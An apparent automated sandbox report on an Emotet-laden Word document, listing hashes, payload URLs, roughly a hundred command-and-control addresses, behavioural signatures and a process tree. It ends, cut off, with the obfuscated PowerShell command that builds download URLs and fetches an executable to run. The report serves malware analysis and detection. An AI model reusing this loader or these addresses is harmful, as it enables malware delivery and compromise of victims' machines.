Analysis
-
max time kernel
18s -
max time network
18s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
28-10-2020 21:03
Static task
static1
General
-
Target
5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc
-
Size
224KB
-
MD5
f87d49246f2654da56ae321bdc8b58d8
-
SHA1
ef8f3f04dd249fa7dbc737d7d346020ff308f94f
-
SHA256
5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2
-
SHA512
fb02be18f2ea24f0e0a970fd517dddce90c923cbdb3d1e0137031cfe0780741170ff6379dc10c5fd586e3109fa49d95a00a99ef55122b19f1b2ff730675567dc
Malware Config
Extracted
https://getpranaveda.xyz/wp-admin/yz/
http://xinhecun.cn/wp-content/VCNbWWDK/
https://www.apeduti.com.br/wp-includes/XN2wg26v/
http://heankan.bio/js/Rb/
https://sheen-vietnam.vn/wp-content/qtg2J6XhZ/
https://madrushdigital.com/wp-admin/PJi/
https://lunabituyelik.com/wp-content/fWd0/
Extracted
emotet
Epoch3
152.32.75.74:443
91.121.200.35:8080
159.203.16.11:8080
188.226.165.170:8080
172.193.79.237:80
123.216.134.52:80
183.91.3.63:80
139.59.61.215:443
185.80.172.199:80
77.74.78.80:443
153.229.219.1:443
113.203.238.130:80
120.51.34.254:80
116.202.10.123:8080
5.2.246.108:80
50.116.78.109:8080
103.80.51.61:8080
190.55.186.229:80
185.142.236.163:443
223.17.215.76:80
188.80.27.54:80
78.90.78.210:80
213.165.178.214:80
82.78.179.117:443
178.33.167.120:8080
58.27.215.3:8080
190.212.140.6:80
177.130.51.198:80
187.193.221.143:80
190.194.12.132:80
5.79.70.250:8080
2.82.75.215:80
79.133.6.236:8080
8.4.9.137:8080
188.166.220.180:7080
203.56.191.129:8080
58.94.58.13:80
189.123.103.233:80
190.180.65.104:80
54.38.143.245:8080
46.105.131.68:8080
119.228.75.211:80
162.144.145.58:8080
36.91.44.183:80
41.76.213.144:8080
202.29.237.113:8080
47.154.85.229:80
42.200.96.63:80
195.201.56.70:8080
41.185.29.128:8080
74.208.173.91:8080
91.83.93.103:443
126.126.139.26:443
190.85.46.52:7080
103.229.73.17:8080
203.153.216.178:7080
192.163.221.191:8080
113.161.148.81:80
115.79.59.157:80
78.101.224.151:80
73.55.128.120:80
180.148.4.130:8080
2.58.16.86:8080
192.210.217.94:8080
117.2.139.117:443
139.59.12.63:8080
179.5.118.12:80
5.2.164.75:80
178.254.36.182:8080
175.103.38.146:80
192.241.220.183:8080
198.20.228.9:8080
115.79.195.246:80
45.239.204.100:80
200.243.153.66:80
109.13.179.195:80
37.205.9.252:7080
172.105.78.244:8080
109.99.146.210:8080
121.117.147.153:443
46.32.229.152:8080
143.95.101.72:8080
157.7.164.178:8081
37.46.129.215:8080
73.100.19.104:80
181.59.59.54:80
5.12.246.155:80
60.108.128.186:80
185.208.226.142:8080
110.37.224.243:80
172.96.190.154:8080
75.127.14.170:8080
51.38.50.144:8080
103.93.220.182:80
109.206.139.119:80
95.76.142.243:80
190.164.135.81:80
190.192.39.136:80
197.221.227.78:80
85.246.78.192:80
91.75.75.46:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 624 1252 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1708-12-0x0000000000470000-0x00000000004B3000-memory.dmp emotet behavioral1/memory/1708-13-0x00000000004C0000-0x0000000000502000-memory.dmp emotet behavioral1/memory/896-17-0x0000000001E60000-0x0000000001EA3000-memory.dmp emotet behavioral1/memory/896-18-0x0000000001EE0000-0x0000000001F22000-memory.dmp emotet -
Blacklisted process makes network request 2 IoCs
Processes:
POwersheLL.exeflow pid process 7 624 POwersheLL.exe 9 624 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Avqv7t89l.exetimeout.exepid process 1708 Avqv7t89l.exe 896 timeout.exe -
Drops file in System32 directory 2 IoCs
Processes:
Avqv7t89l.exePOwersheLL.exedescription ioc process File opened for modification C:\Windows\SysWOW64\WPDSp\timeout.exe Avqv7t89l.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 896 timeout.exe -
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 756 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
POwersheLL.exetimeout.exepid process 624 POwersheLL.exe 624 POwersheLL.exe 896 timeout.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 624 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 756 WINWORD.EXE 756 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEAvqv7t89l.exedescription pid process target process PID 756 wrote to memory of 1052 756 WINWORD.EXE splwow64.exe PID 756 wrote to memory of 1052 756 WINWORD.EXE splwow64.exe PID 756 wrote to memory of 1052 756 WINWORD.EXE splwow64.exe PID 756 wrote to memory of 1052 756 WINWORD.EXE splwow64.exe PID 1708 wrote to memory of 896 1708 Avqv7t89l.exe timeout.exe PID 1708 wrote to memory of 896 1708 Avqv7t89l.exe timeout.exe PID 1708 wrote to memory of 896 1708 Avqv7t89l.exe timeout.exe PID 1708 wrote to memory of 896 1708 Avqv7t89l.exe timeout.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD S e t - I T E m     v A R I A B l e : E 3 8 Z 6     (     [ T Y p e ] ( " { 3 } { 0 } { 4 } { 5 } { 1 } { 2 } "   - f   ' t E M ' , ' i r ' , ' E C t o R y ' , ' S y S ' , ' . i o ' , ' . D ' ) )   ; s e T - v A r i a B L E     F E B 8 W     (   [ T y P e ] ( " { 2 } { 5 } { 0 } { 6 } { 3 } { 1 } { 4 } "   - f ' E M . ' , ' E P o I ' , ' S ' , ' . s E r V I c ' , ' N T m a n A g E r ' , ' Y S T ' , ' n e t ' ) )     ; $ X k h 5 m o d = ( ( ' S y p ' + ' z x ' ) + ' w ' + ' r ' ) ; $ U 8 4 t t 7 c = $ U m k h r o s   +   [ c h a r ] ( 6 4 )   +   $ E u _ a 3 r 9 ; $ I l x i y j c = ( ( ' E 3 ' + ' i ' ) + ' n l ' + ' k u ' ) ;   $ E 3 8 z 6 : : " c ` R e ` A T ` E ` D I R E c t O r y " ( $ H O M E   +   ( ( ( ' h 9 L ' + ' D k u 9 ' + ' b ' ) + ( ' 1 _ h ' + ' 9 ' ) + ' L A ' + ' a ' + ( ' p n 1 v v ' + ' h 9 ' + ' L ' ) ) - R E p L a C E ( [ c h A r ] 1 0 4 + [ c h A r ] 5 7 + [ c h A r ] 7 6 ) , [ c h A r ] 9 2 ) ) ; $ O g w o l o a = ( ( ' U y ' + ' x ' ) + ( ' 4 o ' + ' d ' ) + ' _ ' ) ;   (   G c i     V A r I A b L E : f E B 8 W   ) . v a L U E : : " s e ` c u R ` i t ` Y P r O T O C O L "   =   ( ( ' T ' + ' l s 1 ' ) + ' 2 ' ) ; $ T h m l _ j u = ( ( ' G s a z ' + ' g ' ) + ' e ' + ' i ' ) ; $ C 5 2 p r a m   =   ( ( ' A ' + ' v q ' ) + ( ' v 7 t ' + ' 8 9 l ' ) ) ; $ L a w k o c 4 = ( ' Q d ' + ' 0 i ' + ( ' p l ' + ' w ' ) ) ; $ D 4 n l l y p = ( ' U ' + ( ' 4 y ' + ' p ' ) + ( ' n ' + ' i l ' ) ) ; $ Y u l h v p f = $ H O M E + ( ( ( ' g ' + ' U 8 ' ) + ( ' D ' + ' k u ' ) + ( ' 9 ' + ' b 1 _ ' + ' g U 8 ' ) + ' A ' + ( ' a p ' + ' n 1 v ' ) + ( ' v g U ' + ' 8 ' ) ) . " r E P ` L A ` C E " ( ( ' g ' + ' U 8 ' ) , [ s T R I N G ] [ C h A R ] 9 2 ) ) + $ C 5 2 p r a m + ( ( ' . ' + ' e x ' ) + ' e ' ) ; $ A 6 5 u 8 _ e = ( ( ' X ' + ' h s f 9 4 ' ) + ' g ' ) ; $ N u p r r m 8 = . ( ' n e w - ' + ' o b j ' + ' e c t ' )   N E T . w e B c l i E N t ; $ P g a t h r a = ( ( ' h ' + ( ' t t p s ' + ' : ] [ ' ) + '   ' + ( ( ' 1 )   ' + ' j ' ) ) + ( ' j ' + ' k g ' ) + ' S ' + '   [ ' + ( ( ' ]   [ ] w ] [ ' + '   1 ' + ' ) ' + '   ' ) ) + ' j ' + ( ' j k g ' + ' S   ' ) + ( ' [ ]   [ ' + ' ] w ' ) + ( ' g e t p ' + ' r a n a ' + ' v e d ' ) + ( ' a ' + ' . ' + ' x y z ] [   ' ) + ( ( ' 1 ) ' ) ) + ( '   j j ' + ' k ' ) + ' g S ' + '   ' + ' [ ' + ( ' ]   [ ' + ' ] ' ) + ( ' w ' + ' w p - a d m i n ' + ' ] ' ) + ' [ ' + '   ' + ( ( ' 1 )   ' + ' j j ' + ' k g ' ) ) + ' S ' + ( '   [ ' + ' ]   ' + ' [ ] ' ) + ( ' w y z ' + ' ] ' ) + ( ' [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j ' + ' k g S   [ ] ' ) + ( '   ' + ' [ ] w ' ) + ( ' @ ' + ' h t t ' ) + ( ' p : ' + ' ] ' ) + ( ' [   ' + ' 1 ' ) + ( ( ' ) ' + '   j ' ) ) + ' j k ' + ( ' g S ' + '   [ ]   ' ) + ( ' [ ' + ' ] w ] ' ) + ( ( ' [   1 ) ' + '   ' + ' j j k g ' ) ) + ( ' S   [ ] ' + '   [ ] ' + ' w x i n ' + ' h e c u ' ) + ' n ' + ( ' . c n ] [ ' + '   ' ) + ( ( ' 1 )   j j ' + ' k ' ) ) + ' g S ' + ( '   [ ' + ' ]   [ ' + ' ] ' ) + ( ' w w ' + ' p - c ' ) + ' o n ' + ' t ' + ( ' e ' + ' n t ] [   ' ) + ( ( ' 1 ' + ' )   ' ) ) + ( ' j j k g ' + ' S   ' + ' [ ] ' + '   [ ] w V C ' ) + ( ' N b ' + ' W ' ) + ( ' W D ' + ' K ' ) + ( ' ] [ ' + '   ' ) + ( ( ' 1 ) ' ) ) + ( '   ' + ' j j k g ' ) + ( ' S   [ ] ' + '   ' ) + ( ' [ ] w @ ' + ' h ' ) + ' t ' + ' t ' + ( ' p s ' + ' : ] ' + ' [   1 ' ) + ( ( ' )   j ' + ' j ' ) ) + ( ' k g S ' + '   [ ' + ' ]   ' ) + ( ' [ ' + ' ] w ] [ ' ) + '   1 ' + ( ( ' )   ' ) ) + ( ' j j ' + ' k ' ) + ( ' g S   ' + ' [ ' ) + ( ' ]   ' + ' [ ' ) + ( ' ] ' + ' w w ' + ' w w . ' + ' a p e d ' ) + ( ' u ' + ' t i . ' + ' c o m . b r ' ) + ( ' ] [ ' + '   1 ' ) + ( ( ' )   j j k g S   [ ]   [ ' + ' ] ' + ' w ' ) ) + ' w ' + ( ' p - i n ' + ' c ' ) + ' l ' + ( ' u d e ' + ' s ] [ ' ) + ( ( '   1 )   j ' + ' j k g S   ' + ' [ ' + ' ]   ' ) ) + ' [ ' + ( ( ' ] w X N 2 w ' + ' g ' + ' 2 6 ' + ' v ] [ ' + '   1 )   j j ' + ' k ' + ' g S ' ) ) + ( '   [ ]   [ ' + ' ] w ' + ' @ ' + ' h t ' ) + ( ( ' t ' + ' p : ' + ' ] [   1 )   j ' + ' j ' ) ) + ( ' k ' + ' g S ' ) + ( '   [ ' + ' ]   ' ) + ' [ ] ' + ( ( ' w ] [   1 ' + ' ) ' + '   j j ' + ' k g S ' + '   [ ' ) ) + ( ' ]   [ ' + ' ] w ' ) + ( ' h ' + ' e a n k a n . ' + ' b i o ] [ ' ) + ( ( '   ' + ' 1 )   j j ' + ' k g ' ) ) + ( ' S   ' + ' [ ]   [ ] w ' ) + ' j s ' + ( ' ] ' + ' [   1 ' ) + ( ( ' )   ' + ' j j k ' ) ) + ( ' g S   ' + ' [ ] ' + '   [ ] w ' ) + ( ' R b ] [ ' + '   ' + ' 1 ' ) + ( ( ' ) ' + '   j ' ) ) + ' j ' + ( ' k g S   [ ]   ' + ' [ ] ' + ' w ' ) + ( ' @ h t ' + ' t ' ) + ( ' p s : ' + ' ] [ ' ) + '   ' + ( ( ' 1 ' + ' )   j j k g ' + ' S ' ) ) + ( '   [ ' + ' ]   [ ] ' + ' w ' ) + ( ( ' ] [   1 )   j ' + ' j k ' + ' g S   ' ) ) + ( ' [ ] ' + '   [ ] w s ' + ' h e ' + ' e n ' + ' - v i e t n a m ' + ' . ' + ' v n ' ) + ( ' ] [ ' + '   1 ' ) + ( ( ' )   ' ) ) + ( ' j j ' + ' k ' ) + ( ' g S ' + '   [ ] ' ) + ( '   [ ] w ' + ' w p - ' ) + ( ' c ' + ' o n t e ' ) + ( ' n t ' + ' ] [ ' ) + '   ' + ( ( ' 1 ) ' + '   j j k g S ' ) ) + '   [ ' + ' ]   ' + ( ' [ ] ' + ' w q t g 2 ' + ' J 6 X h ' ) + ( ' Z ] ' + ' [   ' ) + ' 1 ' + ( ( ' )   j j k ' + ' g S   ' ) ) + ( ' [ ' + ' ]   [ ' + ' ] w @ h t t p s ' + ' : ' ) + ( ( ' ] [   1 ' + ' )   j j ' ) ) + ( ' k g ' + ' S ' ) + ( ( '   [ ]   [ ' + ' ] ' + ' w ] [   1 )   j j k ' + ' g ' ) ) + ( ' S   [ ] ' + '   [ ] w m ' + ' a d ' ) + ( ' r u ' + ' s ' + ' h d i g ' ) + ( ' i ' + ' t a l ' ) + ( ' . c ' + ' o m ] ' ) + ( ( ' [   1 ) ' + '   ' + ' j j ' ) ) + ( ' k g S   [ ' + ' ]   [ ] w w ' + ' p ' + ' - a d m i n ' ) + ( ( ' ] [   1 )   j ' + ' j k ' + ' g ' ) ) + ' S ' + '   ' + ( ' [ ] ' + '   ' ) + ' [ ' + ( ' ] w P ' + ' J ' ) + ' i ] ' + ( ' [   ' + ' 1 ' ) + ( ( ' )   j ' + ' j ' ) ) + ' k g ' + ' S   ' + ( ' [ ] ' + '   ' ) + ' [ ' + ( ( ' ] w @ h t t ' + ' p s : ] [   ' + ' 1 )   j j k g S   [ ] ' + '   ' + ' [ ] w ' + ' ] [   1 ) ' ) ) + ( '   j j ' + ' k ' ) + ( ' g S ' + '   [ ] ' ) + ( '  